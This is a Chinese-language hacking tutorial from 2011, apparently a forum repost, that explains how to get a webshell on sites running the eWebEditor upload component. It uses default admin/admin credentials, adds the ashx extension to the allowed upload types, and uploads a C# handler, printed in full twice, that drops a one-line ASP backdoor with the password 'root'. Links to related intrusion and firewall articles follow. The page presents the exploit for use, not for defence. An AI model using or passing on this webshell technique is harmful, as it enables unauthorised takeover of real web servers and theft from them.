ewebeditor 上傳遇到防火墻限制的解決辦法 圖文
發(fā)布時間:2011-05-10 22:18:45 作者:佚名
我要評論

今天看了前面的原創(chuàng)帖子說到eweb遇到asp,asa,cer被限制訪問拿不了shell,正好這個問題我是知道的。應(yīng)該很多大牛都會的吧,估計還是有些不會的,就將就看看吧
這是一個eweb入口(廢話)
<%@ WebHandler Language="C#" Class="Handler" %>
using System;
using System.Web;
using System.IO;
public class Handler : IHttpHandler {
public void ProcessRequest (HttpContext context) {
context.Response.ContentType = "text/plain";
StreamWriter file1= File.CreateText(context.Server.MapPath("root.asp"));
file1.Write("<%response.clear:execute request(\"root\"):response.End%>");
file1.Flush();
file1.Close();
}
public bool IsReusable {
get {return false; }
}
}
然后直接訪問它。。

用默認帳戶密碼admin admin進入
樣式添加asa擴展名
直接上傳asp馬
到這里都是順利的,但是。。當(dāng)你訪問馬的時候。。
試過了小馬,一句話,會出現(xiàn)同樣的問題
解決方法:
在樣式添加里加上擴展名ashx
創(chuàng)建一個1.ashx的文件, 上傳,代碼如下:
復(fù)制代碼
代碼如下:<%@ WebHandler Language="C#" Class="Handler" %>
using System;
using System.Web;
using System.IO;
public class Handler : IHttpHandler {
public void ProcessRequest (HttpContext context) {
context.Response.ContentType = "text/plain";
StreamWriter file1= File.CreateText(context.Server.MapPath("root.asp"));
file1.Write("<%response.clear:execute request(\"root\"):response.End%>");
file1.Flush();
file1.Close();
}
public bool IsReusable {
get {return false; }
}
}
它會在當(dāng)前目錄生成一個root.asp的一句話木馬,密碼為root
然后連接一句話木馬就可以啦~~
拿到shell
相關(guān)文章
- 云火墻與云防火墻的區(qū)別是什么?下面為大家介紹。2012-10-19
通過ssh反向連接內(nèi)網(wǎng)主機的方法(防火墻的主機)
可以通過ssh反向連接到內(nèi)網(wǎng)主機(有防火墻的主機),了解下,方便我們以后防御2012-07-30- RedHatLinux為增加系統(tǒng)安全性提供了防火墻保護。防火墻存在于你的計算機和網(wǎng)絡(luò)之間,用來判定網(wǎng)絡(luò)中的遠程用戶有權(quán)訪問你的計算機上的哪些資源2012-07-13
防火墻Firewall設(shè)置方法之iptables篇
Firewall 防火墻,工作在網(wǎng)絡(luò)或主機的邊緣,對進出本網(wǎng)絡(luò)或主機的數(shù)據(jù)包根據(jù)事先設(shè)置好的規(guī)則進行檢查并且能夠在數(shù)據(jù)包匹配到之后由預(yù)置的動作進行處理的組件的組合2012-07-11McAfee防火墻導(dǎo)致Jmail發(fā)郵件失敗的解決方法
這幾天發(fā)現(xiàn)服務(wù)器上的Jmail發(fā)郵件失敗,又不返回任何錯誤,只是發(fā)送過程很快,像是根本沒執(zhí)行,測試發(fā)現(xiàn)程序是順利執(zhí)行完成的2011-05-23- 經(jīng)典高招打造自己的超級電腦防火墻網(wǎng)絡(luò)安全中談到個人上網(wǎng)時的安全,還是先把大家可能會遇到的問題歸個類吧。2011-02-27
- iptables 這個指令, 如同以下用 man 查詢所見, 它用來過濾封包和做NAT Network Address Translation(網(wǎng)路位址轉(zhuǎn)譯), 這個指令的應(yīng)用很多, 可以做到很多網(wǎng)路上的應(yīng)用.2009-06-18
- 掃不出肉雞有很多的可能!一般有如下的情況! 1.你系統(tǒng)的防火墻,或某些補丁作怪! 2.有些地方是掃不到肉雞的(是不是和各地的電信有關(guān),暫時還不知道) 3.機子2008-10-08
- 弄到一個sa權(quán)限,利落得拿到一個webshell,透過sqlrootkit,俺就是system權(quán)限了.本以為對方菜到家了.誰知故事才剛剛開始.2008-10-08
黑客攻防實戰(zhàn)之對有防火墻網(wǎng)站入侵過程
前幾天群里的兄弟給了一個網(wǎng)站,問我可不可以入侵2008-10-08